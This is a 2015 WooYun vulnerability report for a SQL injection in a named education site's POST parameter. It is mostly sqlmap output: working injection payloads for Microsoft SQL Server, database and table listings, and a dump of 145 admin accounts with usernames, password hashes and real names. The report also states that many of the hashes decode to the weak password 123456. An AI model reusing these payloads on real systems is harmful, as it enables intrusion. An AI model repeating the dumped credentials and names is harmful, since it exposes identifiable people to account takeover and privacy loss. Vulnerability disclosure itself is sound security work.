乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-29: 细节已通知厂商并且等待厂商处理中 2015-06-30: 厂商已经确认,细节仅向厂商公开 2015-07-10: 细节向核心白帽子及相关领域专家公开 2015-07-20: 细节向普通白帽子公开 2015-07-30: 细节向实习白帽子公开 2015-08-14: 细节向公众公开
RT(补充数据证明)
基于时间的盲注,涉及多个数据库,多个弱口令密码
49ba59abbe56e057(123456)
sql注入点
http://1dui1.huatu.com/ydyzs.php post参数 tag=1&title=54O5b8On title参数存在基于时间的盲注
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: tag=1&title=';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: tag=1&title=' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: Microsoft SQL Server 2000current user: 'develop'current database: 'HTOLMain'current user is DBA: Falseavailable databases [11]:[*] HTOL_Card[*] HTOL_DaSai[*] HTOL_Study[*] HTOLMain[*] lumigent[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: tag=1&title=';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: tag=1&title=' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: Microsoft SQL Server 2000Database: HTOLMain[248 tables]+------------------------------+| 360cps || 360cps_copy || AliPay_Cash_Log || Branch_School || Card_Msyy || ChunJie_YouhuiInfo || Cl_Admin || Cl_Ads || Cl_Announce || Cl_Article || Cl_BankrollItem || Cl_CardFree || Cl_CardFreeNum || Cl_Channel || Cl_Class || Cl_Comment || Cl_ConsumeLog || Cl_Course_Price || Cl_CreateFiles || Cl_DeliverItem || Cl_DeliverType || Cl_Favorite || Cl_Friend || Cl_Guest || Cl_Js || Cl_Keyword || Cl_Label || Cl_LinkClass || Cl_LinkConfig || Cl_LinkSite || Cl_MKCard || Cl_Message || Cl_Movie || Cl_NoDownLoad || Cl_Order || Cl_OrderItem || Cl_OrderItem_History || Cl_Order_History || Cl_Page || Cl_PageItem || Cl_PassIP || Cl_Payment || Cl_Photo || Cl_Plus || Cl_Product || Cl_Server || Cl_Setup || Cl_Soft || Cl_Special || Cl_Student_Schedule || Cl_Style || Cl_StyleHelp || Cl_UpFileLog || Cl_User || Cl_UserCz || Cl_UserCz_Used || Cl_UserGroup || Cl_User_Ext || Cl_User_Unactive || Cl_Vote || Cl_acclog || Cl_tylog || ClassHandOut || Complaint || CunGuanClasses || DV_IP || EventLog || FreeCard_ConsumeLog || HTTC_Cl_Order || HTTC_Cl_OrderItem || JCZFClasses || JiFen_Log || JunClasses || LearnAnswers || LearnClassNotes || LearnQuestions || LearnStatInfo || LearningClasses || LearningLog || MianShiClasses || MianShi_AppointmentInfo || MianShi_StudentInfo || MonthOrderCourse || NetClassCategory || NetClassFeedBack || NetClassLogic || NetClassSubjects || NetClassSuit || NetClassTypes || NetClass_Assignment_Relation || NetClass_Assignments || NetClass_Download_Relation || NetClass_Downloads || NetClass_HomeWork || NetClass_Learn_Log || NetClass_Notice || NetClass_Notice_Relation || NetClasses || NetClasses_Treaty || NetClasses_ZengSong || NetLession_Learn_Log || NetLession_Rate_Log || NetLessions || NormalClasses || Order_ext || Privilage_Info || PromoCode || Province || Role_Info || Role_Privilage || RoomCourse || SNS_Blog || SNS_Blog_Category || SNS_Blog_Comment || SNS_Friends || SNS_Friends_Invite || SNS_Friends_Type || SNS_Friends_Visit_Log || SNS_Message_LastView || SNS_NewsFeed || SNS_User_CareerInfo || SNS_User_Contact || SNS_User_Education || SNS_User_LiuYan || SNS_User_LiuYan_Reply || SNS_User_Private_Settings || SNS_User_StatusText || SNS_Vote || SNS_Vote_Result || SNS_Vote_Revote || SNS_Vote_Sub || ScheduleDetail || SheGongClasses || ShiYeClasses || Shumaban_Card || Shumaban_LearnQuestions || TeacherSubjects || Teacher_Rate_Log || Teachers || TiYanCard_Info || TiYanClasses || TrialClasses || Unactive_User_Classes || UnionApply || UnionInfo || Union_AgentFee || Union_News || User_ConsumeLog || User_QH_log || XDTrialClasses || XH_Config || XH_IP || XH_Question || XH_Subject || XH_Title || XH_UserInfo || XiangZhenClasses || XuanDiaoClasses || ZhaoJingClasses || activelink || bishi_StudentInfo || city || cl_list || cl_newpermissions || classBanbie || classPhase || classTable || classTixi || classTpl || classVer || classView || comment || digitalArea || digitalClass || digital_replyRate || drm_ip || dtproperties || emailLog || freecard_order_relation || generateCourseRecord || helpCenter || helpType || hteacher_userunion || indexHot || indexNew || indexRebao || jiangyiimg || jsName || jsSize || knowledge_point || learn_activity_list || lession_rate || lession_studyresult || lesson_vote || libyc_usertbinfo || libyc_usertbspaceused || merchant || mkClass || monthCardUser || monthOrder || monthOrderRemark || netclassext || netclassexttype || noteType || oldUserDiscount || orderextent || poll || promary || puzi_Recommend || puzi_subject || qpx_userInfo || recommendUnion || registerInfo || replyRate || shumaban_LearnAnswers || studentNote || studentNoteReply || sysconstraints || syssegments || teaUser_ConsumeLog || teachers_vote || teauserunionad || tem10sgkNote || temBless || temGkNote || temGqNote || temWy || temZb || tmp_userArea || tmptyk || unionAd || unionAdVisit || unionFocusImg || unionNote || unionNoteReply || unionRegInfo || unionRequest || unionType || userunion || userunion_fankuan || userunionad || xieyiedit || yeepay_cash_log || yiqifa || htol.choujiangKU || htol.choujiangMD || htol.choujiangMD2 || htol.userunionsalary |+------------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: tag=1&title=';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: tag=1&title=' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: Microsoft SQL Server 2000Database: HTOLMainTable: Cl_Admin[16 columns]+----------------+----------+| Column | Type |+----------------+----------+| AddUser | nvarchar || arrClassCheck | ntext || arrClassInput | ntext || arrClassMaster | ntext || department | nvarchar || flag | tinyint || ID | int || LastLoginIP | nvarchar || LastLoginTime | datetime || LastLogoutTime | datetime || LoginTimes | int || Password | nvarchar || Purview | ntext || Purview_Other | ntext || realname | nvarchar || UserName | nvarchar |+----------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tag=1&title=' AND 1236=1236 AND 'Zqsp' LIKE 'Zqsp Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tag=1&title=' AND 8753=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8753=8753) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'SLhA' LIKE 'SLhA Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: tag=1&title=';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: tag=1&title=' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: tag=1&title=' UNION ALL SELECT NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(110)+CHAR(106)+CHAR(107)+CHAR(97)+CHAR(68)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: Microsoft SQL Server 2000Database: HTOLMainTable: Cl_Admin[145 entries]+------------------+------------------+----------+| UserName | Password | realname |+------------------+------------------+----------+| cxhtest | 7202ac6ae9a9a751 | 蔡晓辉 || htjy408 | 7545ba2e1ac45b39 | 蔡淝田 || htwx080 | 961b2b3b5f14c1bb | 孙旭光 || htwx0742 | ffc38b3b0bb15c5c | 靳畅 || htyangjie | e34f92d36b069a6a | 杨杰 || htjyl0127 | 1cef9c26aa67ab58 | 王铁红 || htwx0635 | 0c65d5ec81707084 | 王玲 || htjyl1093 | 5fe9db73ac365a6c | 魏本见 || htwxsx291 | 37e941b4aa8f39ad | 徐小妹 || fjwfjw | 8d4dd7ba0c3c72bf | 傅建文 || htjy0591 | 5f8326b142088fec | 李凯 || htjyl084 | 81b4398d68735568 | 刘真宗 || xinglily | 9fa2f7ec34ff3f07 | 省丽丽 || zhangdejiang | 8654796b618b18da | 张德江 || htwxzb080 | d551ec92912f3989 | 张梦元 || htjy0974 | c3ca81eac41938c0 | 韩利亚 || htwx1648 | 7c387f21a5801303 | 王红飞 || htjy3860 | 7c1040524eb576b6 | 张宏宇 || huatu1772 | 334c07e86695b1aa | 李娇 || huangjinxia | 9b2c3c191bfbd273 | 黄金霞 || htwx4112 | 0c546befd4151682 | 韦柳 || htwxl004 | dae943e903dd210f | 刘洪燕 || htwxl007 | 22cd38918ec095b1 | 李文龙 || htjy4233 | 98bd35d284dae6af | 白秋冰 || liuyuting929 | 6c101ea1b54f2de4 | 刘玉婷 || huatu4935 | 28654f37c99225bd | 赵仿 || htjy1987 | b9f53508d38ed8ca | 郭元双 || 肺儿vivv | 8747df9ea382e353 | 杨雯 || htjy5818 | 5cd861ba6dee8ff1 | 徐利国 || qinzhimin秦志敏 | 49ba59abbe56e057 | 秦志敏 || htxinghua | b78d7e71ac5514e5 | 邢华 || htjy6188 | e528df012027aedf | 张海亮 || 李品友 | 310368c3ded5e492 | 李品友 || dongpeirong | e528df012027aedf | 董培荣 || htwx6349 | 3b31dd1b2fef8895 | 何斌 || tencent | 63202bfd738a9df2 | 郭勇 || louwaixian | 7a3e6346b0439fb2 | 李园 || htjy7218 | 23c3a03d20b7b660 | 朱坤月 || htcaijinlong | 295447b4c8419e7d | 蔡金龙 || gaoshuang1018 | 93214a1202fe4170 | 郜爽 || htjy7514 | ccff059415805dcc | 王红丽 || htwxzb078 | fe704367e11653ea | 周为 || htzhaojing1987 | 49ba59abbe56e057 | 赵晶 || dupengliang2008 | 49ba59abbe56e057 | 杜鹏亮 || htmalan | 49ba59abbe56e057 | 马兰 || htguolei | 6c6da156be4d0a77 | 郭磊 || htjy6684 | 6e6f7bae26bd4046 | 李慧 || htjyl081 | 217daa75b32ab47d | 曹丁月 || htjs2101 | e2cddf8d44ddb24d | 王利科 || htjy3785 | ad77bdfecf2c404c | 孙亚非 || zhaojiaody | 8c090a14e428d774 | 招教答疑账号 || htwxsh-liuyan | 49ba59abbe56e057 | 刘妍 || 2013dbmsd | 49ba59abbe56e057 | 山东分校 || 2013dbmbj | 49ba59abbe56e057 | 北京分校 || 2013dbmgd | e528df012027aedf | 广东分校 || 2013dbmsz | 49ba59abbe56e057 | 深圳分校 || 2013dbmqd | 49ba59abbe56e057 | 青岛分校 || 2013dbmjs | 49ba59abbe56e057 | 江苏分校 || 2013dbmln | 3f9537b4d4d5d56f | 辽宁分校 || 2013dbmjx | 49ba59abbe56e057 | 江西分校 || 2013dbmyn | 49ba59abbe56e057 | 云南分校 || 2013dbmzj | 49ba59abbe56e057 | 浙江分校 || 2013dbmah | 49ba59abbe56e057 | 安徽分校 || 2013dbmwh | 6590cd208b8f4de1 | 芜湖分校 || 2013dbmhn | 49ba59abbe56e057 | 河南分校 || 2013dbmhb | 49ba59abbe56e057 | 河北分校 || 2013dbmhub | 49ba59abbe56e057 | 湖北分校 || 2013dbmyc | 49ba59abbe56e057 | 宜昌分校 || 2013dbmhun | 49ba59abbe56e057 | 湖南分校 || 2013dbmsy | 49ba59abbe56e057 | 邵阳分校 || 2013dbmnmg | 49ba59abbe56e057 | 内蒙古分校 || 2013dbmhlbe | 49ba59abbe56e057 | 呼伦贝尔分校 || 2013dbmsx | 49ba59abbe56e057 | 山西分校 || 2013dbmcc | bd240168bf189c9d | 吉林长春分校 || 2013dbmshx | 49ba59abbe56e057 | 陕西分校 || 2013dbmgx | 49ba59abbe56e057 | 广西分校 || 2013dbmgz | 49ba59abbe56e057 | 贵州分校 || 2013dbmxj | 49ba59abbe56e057 | 新疆分校 || 2013dbmsc | dbd5c91e1ce150d8 | 四川分校 || 2013dbmtj | 49ba59abbe56e057 | 天津分校 || 2013dbmfj | 49ba59abbe56e057 | 福建分校 || 2013dbmxm | 49ba59abbe56e057 | 厦门分校 || 2013dbmhain | 49ba59abbe56e057 | 海南分校 || 2013dbmcq | 49ba59abbe56e057 | 重庆分校 || 2013dbmnx | 49ba59abbe56e057 | 宁夏分校 || 2013dbmgs | ed093d23e4b4f666 | 甘肃分校 || 2013dbmqh | 49ba59abbe56e057 | 青海分校 || 2013dbmxz | 49ba59abbe56e057 | 西藏分校 || 2013dbmhlj | 49ba59abbe56e057 | 黑龙江分校 || 2013dbmjl | 49ba59abbe56e057 | 吉林市分校 || 2014dbmdl | 49ba59abbe56e057 | 大连分校 || htwxjianglu | 6d86bb70aebaea5f | 姜璐 || htwxhtshenjiting | 49ba59abbe56e057 | 沈及廷 || htwxzhangjian | e91ded229ba29284 | 张建 || htwxzhouwen | 2b08341d15348645 | 周文 || 2014dbmly | 49ba59abbe56e057 | 临沂分校 || htwxhtliutao | 2536bb275e3fb8d2 | 刘涛 || htwxchangxuan | 62f042d1857c66dd | 常轩 || htwxyangxiu | 14e1f06d68c5b339 | 杨秀 || htjy5679 | 49ba59abbe56e057 | 胡浩 || htwxzhaohy | 49ba59abbe56e057 | 赵环宇 || htwxlixiaofeng | 62a29f5731354b1c | 李晓凤 || htwxwxlibo | 49ba59abbe56e057 | 李博 || htwxchengyongle | 49ba59abbe56e057 | 程永乐 || htwxhujp | 227c0381976beea4 | 胡锦平 || htwxzhoujl | 49ba59abbe56e057 | 周江龙 || htwxhubo | 49ba59abbe56e057 | 胡泊 || htwxwxlining | 49ba59abbe56e057 | 李宁 || htwxleijie | 49ba59abbe56e057 | 雷婕 || htwxpeihf | b8e9597221dfad60 | 裴红粉 || htwxxiaotf | be578a5caf991d18 | 肖腾飞 || htwxwangmeijuan | 49ba59abbe56e057 | 王美娟 || htjy_010383 | 4b1326c98617f689 | 郭玉康 || htwxxiehuayun | f8ed4f05b7db9151 | 谢化云 || htwxcuixz | 227be011b9732c58 | 崔显志 || htwxzhaoyong | b2bf2966ef482595 | 赵勇 || htwxzhanghq | 49ba59abbe56e057 | 张海琦 || htwxzhangfan | cfc146b448ef26af | 张帆 || htwxwxlifei | 445bb47b60cf5f54 | 李飞 || htwxzhangel | 49ba59abbe56e057 | 张二龙 || 2015dbmnb | 49ba59abbe56e057 | 山东分校 || htwxxiege | 49ba59abbe56e057 | 谢舸 || htwxhouxq | 3d58cd1769c6e676 | 侯鑫琴 || htwxbiwei | 83449dde8972df86 | 毕炜 || htwxxuxf | 49ba59abbe56e057 | 许晓霏 || htwxhtyuexin | fbeaed20868fe492 | 岳鑫 || htwxwxliulu | 49ba59abbe56e057 | 刘陆 || htwxwxlishuai | 341192aeeabe54b3 | 李帅 || weibj666 | 5fe9db73ac365a6c | 魏本见 || htwxfengyun | a230e17badc194ab | 冯云 || htwxxiongying | c384aa278ff8bbcd | 熊瑛 || htwxgaoyu | 737559f4aae9a82f | 高宇 || htwxtianzy | 49ba59abbe56e057 | 田志英 || htwxdengcj | 49ba59abbe56e057 | 邓昌菊 || 2013dbmbj_gk | 49ba59abbe56e057 | 王宇航 || htwxcaidong | 83aa400af464c76d | 蔡冬 || htwxlinjq | aad782eb7517c8de | 林佳岐 || htjylzy | c26304613465603f | 刘振宇 || htwxxiongqy | 136b2c50a043fe12 | 熊其焰 || htwxl691 | 8b1da629ee274cd5 | 申甲子 || htwxfull | c26304613465603f | 付莉莉 || htwx_4043555 | 97a7757b9e175580 | 王凌燕 || htzhoushenghan | c26304613465603f | 周圣涵 || htwxluoxm | 0f6fb996e6ee84df | 骆晓明 || app_5503c448 | c26304613465603f | 张蕾 |+------------------+------------------+----------+
参数过滤
危害等级:高
漏洞Rank:15
确认时间:2015-06-30 10:57
正在处理,谢谢
暂无
